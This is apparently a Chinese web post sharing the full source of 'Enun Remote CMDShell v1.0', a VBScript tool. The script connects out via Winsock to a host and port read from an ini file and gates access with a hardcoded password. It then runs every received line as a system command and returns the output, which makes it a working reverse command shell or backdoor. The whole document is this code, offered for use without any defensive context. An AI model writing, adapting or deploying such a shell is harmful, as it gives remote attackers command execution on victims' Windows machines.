VBScript Enun Remote CMD Shell代码

效果如图：

代码如下:

'============================
' Enun Remote CMDShell v 1.0
'============================

Option Explicit

CONST ACCOUNT_LOCK_TIME = 600000    '账户锁定时间，10分钟
CONST LOCKOUT_BAD_COUNT = 3     '密码失败次数
CONST DEFAULT_WAIT_TIME = 1000     '默认延时，1秒
CONST DEFAULT_TIME_OUT  = 60000    '默认超时，60秒

Public WinSocket, sRevData, Count
Do
 On Error Resume Next

Do While (WinSocket.State <> 7)
  Dim ObjectFSO, GetConfig, Line, Host, Port, i

Set WinSocket = WScript.CreateObject("MSWinsock.Winsock")
  Set ObjectFSO = CreateObject("Scripting.FileSystemObject")
  Set GetConfig = ObjectFSO.OpenTextFile(".\enunrc.ini", 1)

For i = 1 To 3
   Line = GetConfig.ReadLine
   If InStr(Line,"Host") > 0 Then Host = Split(Line, "=", -1, 1)(1)
   If InStr(Line,"Port") > 0 Then Port = Split(Line, "=", -1, 1)(1)
  Next

If (Len(Host) = 0) Then Host = "127.0.0.1"
  If (Len(Port) = 0) Then Port = "8090"

WinSocket.Protocol = 0
  WinSocket.RemoteHost = Host
  WinSocket.RemotePort = Port
  WinSocket.Connect

WScript.Sleep DEFAULT_WAIT_TIME * 5
  Call TrackScript(2, WinSocket.State, WinSocket.BytesReceived)
  'Setp: 2
 Loop

Do While (WinSocket.State <> 9 and WinSocket.State <> 0)

Dim AuthKey, LockoutBadCount, TIMEOUT_M, TIMEOUT_N

TIMEOUT_N = 0

WinSocket.SendData WinSocket.LocalHostName & " is Connected, Enter Password: "
  Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)
   TIMEOUT_N = TIMEOUT_N + 1000

Call ControlTimeout(TIMEOUT_N)
  Loop

WinSocket.GetData Authkey, vbString
  If Split(Authkey, chr(10), -1, 1)(0) = "veteran" Then
   WinSocket.SendData "Logon Success, Welcome!" & vbcrlf

sRevData = "veteran"

Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)
    Dim ShellObj, Executes

Set ShellObj = CreateObject("WScript.Shell")
    Set Executes = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))

WinSocket.SendData Executes.StdOut.ReadAll
    WinSocket.SendData Executes.StdErr.ReadAll

If (Len(sRevData) > 0) Then
     TIMEOUT_M = 0
     WinSocket.SendData vbcrlf & "[" & WinSocket.LocalHostName & "@enun]#: "
    Else
     Do While (WinSocket.BytesReceived = 0 and WinSocket.State <> 9 and WinSocket.State <> 0)
      TIMEOUT_M = TIMEOUT_M + 1000
      Call ControlTimeout(TIMEOUT_M)
     Loop
    End If

If (LCase(Left(sRevData, 4)) = "exit") Then WinSocket.Close

WinSocket.GetData sRevData, vbString

WScript.Sleep DEFAULT_WAIT_TIME
    Call TrackScript(5, WinSocket.State, WinSocket.BytesReceived)
    'Setp: 5
   Loop
  Else
   LockoutBadCount = LockoutBadCount + 1
   WinSocket.SendData "Logon fail: Unknown user name or bad password." & vbcrlf
   WScript.Sleep DEFAULT_WAIT_TIME
  End If

If (LockoutBadCount = LOCKOUT_BAD_COUNT) Then
   WinSocket.SendData "Failed too many times, the account has been locked!" & vbcrlf
   WScript.Sleep DEFAULT_WAIT_TIME
   WinSocket.Close

LockoutBadCount = 0
   WScript.Sleep ACCOUNT_LOCK_TIME
   '锁定账户
  End If
  Call TrackScript(3, WinSocket.State, WinSocket.BytesReceived)
  'Setp: 3
 Loop
 Call TrackScript(1, WinSocket.State, WinSocket.BytesReceived)
 'Setp: 1
Loop

'=======================
'Control Timeout.
'=======================
Public Sub ControlTimeout(Count)
 If Count = DEFAULT_TIME_OUT Then
  WinSocket.SendData vbcrlf & "Local server response timeout, Please reconnect ..." & vbcrlf
  WScript.Sleep DEFAULT_WAIT_TIME
  WinSocket.Close
  '控制端60秒内无输入的话，连接自动断开，可即时连接。
 Else
  WScript.Sleep DEFAULT_WAIT_TIME
 End If
 Call TrackScript(4, WinSocket.State, WinSocket.BytesReceived)
 'Setp: 4
End Sub

'=======================
'Track Script.
'=======================
Public Sub TrackScript(MyStep, StateCode, BytesReceived)
 WScript.echo "MyStep: " & MyStep & ", StateCode: " & StateCode & ", Received: " & BytesReceived & " Bytes"
End Sub